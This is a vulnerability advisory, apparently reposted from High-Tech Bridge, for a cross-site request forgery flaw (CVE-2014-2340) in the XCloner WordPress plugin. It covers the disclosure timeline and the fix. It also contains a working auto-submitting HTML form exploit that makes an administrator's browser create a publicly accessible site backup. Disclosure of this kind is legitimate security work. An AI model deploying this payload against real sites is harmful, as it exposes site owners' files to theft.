Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability

Product: XCloner Wordpress plugin
Vendor: XCloner
Vulnerable Version(s): 3.1.0 and probably prior
Tested Version: 3.1.0
Advisory Publication:  March 12, 2014  [without technical details]
Vendor Notification: March 12, 2014
Vendor Patch: March 13, 2014
Public Disclosure: April 2, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-2340
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website.
 
 
Сross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340
 
The vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup.
 
Simple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL:
 
 
<form action="http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm" method="post" name="main">
<input type="hidden" name="dbbackup" value="1">
<input type="hidden" name="dbbackup_comp" value="">
<input type="hidden" name="bname" value="backup">
<input type="hidden" name="backupComments" value="">
<input type="hidden" name="option" value="com_cloner">
<input type="hidden" name="task" value="generate">
<input type="hidden" name="boxchecked" value="0">
<input type="hidden" name="hidemainmenu" value="0">
<input type="hidden" name="" value="">
<input type="submit" name="run" value="run">
</form>
<script>
document.main.submit();
</script>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to XCloner 3.1.1
 
More Information:
http://www.xcloner.com/support/download/?did=9
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - Сross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin.
[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

#  0day.today [2018-01-09]  #